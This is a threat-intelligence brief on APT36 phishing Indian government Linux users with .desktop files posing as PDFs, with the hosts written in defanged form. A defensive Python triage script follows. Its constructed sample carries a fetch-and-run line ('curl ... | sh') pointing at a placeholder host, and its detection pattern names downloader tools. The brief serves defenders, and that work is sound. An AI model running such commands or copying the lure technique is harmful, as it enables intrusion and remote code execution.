Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing
Briefly

"Initial access is achieved through spear-phishing emails," CYFIRMA said. "Linux BOSS environments are targeted via weaponized .desktop shortcut files that, once opened, download and execute malicious payloads." Transparent Tribe, also called APT36, is assessed to be of Pakistani origin, with the group - along with its sub-cluster SideCopy - having a storied history of breaking into Indian government institutions with a variety of remote access trojans (RATs).
"The attack chains begin with phishing emails bearing supposed meeting notices, which, in reality, are nothing but booby-trapped Linux desktop shortcut files ("Meeting_Ltr_ID1543ops.pdf.desktop"). These files masquerade as PDF documents to trick recipients into opening them, leading to the execution of a shell script. The shell script serves as a dropper to fetch a hex-encoded file from an attacker-controlled server ("securestore[.]cv") and save it to disk as an ELF binary, while simultaneously opening a decoy PDF hosted on Google Drive by launching Mozilla Firefox."
Initial access is achieved through spear-phishing emails containing booby-trapped .desktop shortcut files disguised as PDFs. Opening the .desktop file executes a shell script that downloads a hex-encoded payload from securestore[.]cv, saves it as an ELF binary, and opens a decoy PDF via Mozilla Firefox. A Go-based binary contacts a hard-coded C2 at modgovindia[.]space:4000 to receive commands, fetch payloads, and exfiltrate data. Persistence is achieved through a cron job that relaunches the payload after reboot or termination. Targets include Indian government entities on Windows and BOSS Linux, and the actor is linked to APT36/Transparent Tribe.
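The lure described above relies on a .desktop launcher whose name and icon imitate a PDF while its Exec= line runs a shell dropper. The following triage script is an added example (not code from The Hacker News or CYFIRMA) that parses a .desktop file and reports the masquerade traits; the sample entry is constructed for the demo and its Exec= line is a placeholder, not the campaign's script.

```python
"""Flag .desktop shortcuts that masquerade as documents (defensive triage)."""
import re

# Constructed sample modelled on the reported lure name; placeholder Exec=.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Exec=bash -c "curl -s http://placeholder.invalid/x | sh"
Icon=application-pdf
Terminal=false
"""

# Constructed benign entry for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
"""

DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)\.desktop$", re.I)
DOC_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)
DOC_ICON = re.compile(r"^application-(pdf|msword|vnd\.)", re.I)
SHELL_TOOLS = re.compile(r"\b(sh|bash|zsh|curl|wget|xxd|base64|python3?|perl)\b")


def parse_desktop(text: str) -> dict:
    """Return key/value pairs from the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def suspicious_reasons(filename: str, text: str) -> list:
    """List the document-masquerade traits found in one .desktop file."""
    entry, reasons = parse_desktop(text), []
    if DOC_EXT.search(filename):
        reasons.append("document-like double extension")
    if DOC_NAME.search(entry.get("Name", "")):
        reasons.append("Name= field mimics a document")
    if SHELL_TOOLS.search(entry.get("Exec", "")):
        reasons.append("Exec= invokes a shell or downloader")
    if DOC_ICON.search(entry.get("Icon", "")):
        reasons.append("Icon= imitates a document type")
    return reasons
```

Run it over a user's ~/Desktop or a mail-attachment quarantine directory; a file with several reasons, particularly a document-like name paired with a shell-invoking Exec=, deserves a closer look.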
Read at The Hacker News